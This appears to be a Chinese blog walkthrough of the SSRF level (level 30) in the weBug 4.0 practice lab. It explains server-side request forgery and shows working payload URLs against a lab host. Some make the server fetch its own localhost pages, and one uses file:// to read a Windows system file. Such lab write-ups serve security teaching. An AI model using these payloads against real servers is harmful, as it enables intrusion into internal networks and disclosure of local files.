weBug 4.0 第30关 ssrf

构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
相当于,我们能访问一个web服务器,然后web服务器向内网服务器请求资源。我们就可以恶意构造这个请求。造成本地文件泄露,对内网进行扫描,得到有漏洞的信息。

科普完毕,接下来打开页面。
可以看到url如下,页面为404。

http://192.168.43.147/control/more/ssrf.php?url=localhost/pt_env/control/xss/xss_1.php?id=1

很明显服务器端发起了请求,不过这里就这一个服务器,为了测试就对自己发起请求。但是路径有点问题,将其修改为

http://192.168.43.147/control/more/ssrf.php?url=localhost/control/xss/xss_1.php?id=1

可以看到请求到了xss的页面,其他页面自行修改路径。

还可以用file协议读取本地文件,可以看到读取到了c盘本地文件。

http://192.168.43.147/control/more/ssrf.php?url=file:///windows/system.ini

你可能感兴趣的:(weBug 4.0 第30关 ssrf)